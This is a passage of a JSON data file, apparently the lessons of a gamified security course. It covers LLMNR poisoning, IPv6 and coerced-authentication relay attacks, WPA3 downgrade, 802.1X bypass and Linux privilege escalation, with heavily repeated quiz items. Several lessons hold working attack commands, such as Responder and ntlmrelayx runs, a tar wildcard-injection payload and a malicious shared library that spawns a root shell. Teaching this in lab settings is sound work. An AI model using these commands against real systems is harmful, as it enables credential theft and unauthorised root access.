means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"net-nbtns-poisoning","cat":"Network Attacks","title":"NBT-NS and LLMNR Poisoning Details","diff":2,"xp":150,"intro":"Answer broadcast name resolution queries to capture credentials.","sections":[{"type":"text","content":"Windows broadcasts LLMNR (UDP 5355) and NBT-NS (UDP 137) when DNS fails. Answer these broadcasts and the victim authenticates to you, sending their NTLMv2 hash."},{"type":"code","lang":"bash","content":"# Run Responder (answers LLMNR/NBT-NS/MDNS)\nsudo responder -I eth0 -rdwv\n# Hashes captured in /usr/share/responder/logs/\n\n# Crack with hashcat (NTLMv2 = mode 5600)\nhashcat -m 5600 hashes.txt rockyou.txt\n\n# Or relay instead of cracking\nimpacket-ntlmrelayx -tf targets.txt -smb2support"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"LLMNR poisoning captures...","opts":["Cleartext passwords","NTLMv2 hashes","Kerberos tickets","SSH keys"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"net-ipv6-attack","cat":"Network Attacks","title":"IPv6 Attack Techniques","diff":3,"xp":200,"intro":"Exploit the often-unsecured IPv6 stack on dual-stack networks.","sections":[{"type":"text","content":"Most networks deploy IPv6 alongside IPv4 but forget to secure it. Send rogue router advertisements to become the default gateway for IPv6 traffic."},{"type":"code","lang":"bash","content":"# Rogue Router Advertisement\nmitm6 -d target.local\n# Combined with ntlmrelayx:\nimpacket-ntlmrelayx -6 -t ldaps://DC.target.local -wh fake-wpad.target.local -l loot\n# This captures credentials from machines that prefer IPv6\n# Works even if IPv6 isn't 'officially' used"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"IPv6 attacks work on many networks because...","opts":["IPv6 is faster","Admins deploy IPv6 but forget to add firewall rules","IPv6 is encrypted","IPv6 uses different ports"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"net-wifi-wpa3-attacks","cat":"Network Attacks","title":"WPA3 and Dragonfly Handshake Attacks","diff":4,"xp":250,"intro":"Attack the latest Wi-Fi security protocol.","sections":[{"type":"text","content":"WPA3 uses the Dragonfly handshake (SAE) which resists offline dictionary attacks. But timing side-channels (Dragonblood) and downgrade attacks to WPA2 are still possible."},{"type":"code","lang":"bash","content":"# Dragonblood timing attack\n# Measure time differences in SAE commit messages\n# Different timing = different password character groups\n\n# WPA3 transition mode downgrade\n# If the AP supports both WPA2 and WPA3:\n# Force client to connect via WPA2 by deauthing WPA3 connections\naireplay-ng -0 10 -a AP_MAC wlan0mon\n# Client falls back to WPA2 -> capture handshake -> crack"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WPA3's Dragonfly handshake prevents...","opts":["All attacks","Offline dictionary attacks (but timing side-channels exist)","Online attacks","Deauthentication"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"net-coerce-auth","cat":"Network Attacks","title":"Coerced Authentication Attacks","diff":4,"xp":250,"intro":"Force a machine to authenticate to you using PetitPotam, PrinterBug, DFSCoerce.","sections":[{"type":"text","content":"Trigger a Windows machine to make an authenticated request to your listener. Combined with NTLM relay, this gives you access to the target machine or lets you relay to ADCS for a certificate."},{"type":"code","lang":"bash","content":"# PetitPotam (MS-EFSRPC)\npython3 PetitPotam.py listener_ip target_ip\n# PrinterBug (MS-RPRN)\npython3 printerbug.py domain/user:pass@target listener_ip\n# DFSCoerce\npython3 DFSCoerce.py -u user -p pass -d domain.local listener_ip target_ip\n\n# Relay the coerced auth to ADCS for a certificate\nimpacket-ntlmrelayx -t http://ADCS-server/certsrv/certfnsh.asp -smb2support --adcs"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Coerced authentication forces a machine to...","opts":["Reboot","Authenticate to an attacker-controlled listener","Change its password","Disable its firewall"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"net-802.1x-bypass","cat":"Network Attacks","title":"802.1X Network Access Control Bypass","diff":5,"xp":300,"intro":"Bypass port-based network access control on enterprise networks.","sections":[{"type":"text","content":"802.1X uses EAP authentication before granting network access. Bypass by: capturing and replaying EAP sessions, using a transparent bridge between an authenticated device and the switch, or exploiting MAB (MAC Authentication Bypass) fallback."},{"type":"code","lang":"bash","content":"# Transparent bridge bypass\n# Place your device between an authenticated device and the switch\n# Bridge the traffic transparently\n# The switch sees the authenticated MAC\nbrctl addbr br0\nbrctl addif br0 eth0 eth1\nifconfig br0 up\n\n# MAB bypass (if fallback is enabled)\n# Clone an authorized device's MAC\nmacchanger -m AA:BB:CC:DD:EE:FF eth0\n\n# EAP-Relay\n# Relay EAP frames between your device and an authenticated supplicant"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"802.1X bypass via transparent bridge works because...","opts":["It cracks passwords","The switch sees the original authenticated device's traffic","It disables 802.1X","It uses a VPN"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"pe-linux-wildcard-injection","cat":"Privilege Escalation","title":"Wildcard Injection in Cron Jobs","diff":2,"xp":150,"intro":"Abuse shell wildcard expansion to inject arguments into commands.","sections":[{"type":"text","content":"If a cron job runs 'tar czf backup.tar.gz *' in a directory you control, create files named '--checkpoint=1' and '--checkpoint-action=exec=sh shell.sh'. The shell expands * to include your filenames as arguments."},{"type":"code","lang":"bash","content":"# Cron runs: cd /var/backup && tar czf /tmp/backup.tar.gz *\n\n# Create malicious filenames in /var/backup/\necho 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > shell.sh\ntouch -- '--checkpoint=1'\ntouch -- '--checkpoint-action=exec=sh shell.sh'\n\n# When tar runs: tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh shell.sh file1 file2\n# tar executes shell.sh at each checkpoint"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Wildcard injection works because...","opts":["Tar has a vulnerability","Shell expands * to filenames which become command arguments","The cron job is misconfigured","The file system is writable"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-linux-shared-lib","cat":"Privilege Escalation","title":"Shared Library Hijacking (LD_LIBRARY_PATH)","diff":3,"xp":200,"intro":"Hijack library loading to inject code into privileged processes.","sections":[{"type":"text","content":"If a SUID binary loads shared libraries from a writable path, or LD_LIBRARY_PATH is preserved, create a malicious .so that gets loaded first."},{"type":"code","lang":"bash","content":"# Find SUID binaries with missing libraries\nstrace /usr/local/bin/suid-binary 2>&1 | grep 'No such file'\n# If it tries to load libcustom.so from a writable path:\n\n# Create malicious library\ncat > evil.c << 'EOF'\n#include <stdio.h>\n#include <stdlib.h>\nstatic void inject() __attribute__((constructor));\nvoid inject() { setuid(0); system(\"/bin/bash -p\"); }\nEOF\ngcc -shared -fPIC -o libcustom.so evil.c\n# Place in the search path\ncp libcustom.so /writable/path/"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Shared library hijacking exploits...","opts":["Buffer overflows","The dynamic linker's library search order","Network protocols","File permissions"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-printnightmare","cat":"Privilege Escalation","title":"PrintNightmare (CVE-2021-34527)","diff":3,"xp":250,"intro":"Exploit the Windows Print Spooler for instant SYSTEM.","sections":[{"type":"text","content":"PrintNightmare allows a low-privileged user to load a malicious DLL via the Print Spooler 